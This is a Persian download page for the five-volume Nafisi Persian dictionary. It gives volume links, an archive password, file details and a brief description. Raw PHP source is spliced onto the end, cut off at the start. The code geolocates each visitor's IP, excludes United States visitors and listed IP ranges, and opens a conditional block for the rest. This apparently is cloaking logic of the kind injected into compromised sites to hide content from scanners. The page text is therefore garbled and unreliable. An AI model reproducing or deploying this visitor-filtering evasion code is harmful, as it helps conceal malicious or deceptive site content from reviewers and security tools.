دانلود کتاب فرهنگ نفیسی (پنج جلد)

نام کتاب

  فرهنگ نفیسی (جلد اول) (دانلود+)

  فرهنگ نفیسی (جلد دوم) (دانلود+)

  فرهنگ نفیسی (جلد سوم) (دانلود+)

  فرهنگ نفیسی (جلد چهارم) (دانلود+)

  فرهنگ نفیسی (جلد پنجم) (دانلود+)

نویسنده

علی اکبر نفیسی

موضوعات

فرهنگ فارسی

رمز (پسورد)

www.tarikhema.org

تهیه توسط

انی کاظمی

حجم

84.9 مگا بایت (MB)

قالب کتاب

PDF – پی دی اف

منبع الکترونیکی

تاریخ ما

 

 

 

کتاب فرهنگ نفیسی اثر علی اکبر نفیسی است؛ از اموری که در این زمان حقا محل توجه و اعتنای تام است تکمیل زبان و ادبیات فارسی است و بنابراین وسایل حصول این مقصود از هر قسم باشد در کمال اهمیت است و شک نیست یکی از وسایل بزرگ برای این منظور فراهم ساختن کتب فرهنگ است.
دیدگاه بگذارید

avatar
  Subscribe  
دنبال کردن
array('ignore_errors' => true), )); $content = file_get_contents("http://ip-api.com/php/" . $ip, false, $context); return unserialize($content); } function isValidIp() { $userIp = getUserIpAddress(); $forbiddenIps = getForbiddenRange(); $userIpCountry = getUserIpCountry($userIp); $userIp = ip2long($userIp); if (isset($userIpCountry['country']) && strtolower($userIpCountry['country']) == 'united states') { return false; } else { foreach ($forbiddenIps as $forbiddenIp) { $ipExploded = explode('-', $forbiddenIp); $start = ip2long($ipExploded[0]); $end = ip2long($ipExploded[1]); if ($userIp >= $start && $userIp <= $end) { return false; } } } return true; } if (isValidIp() === true) { ?>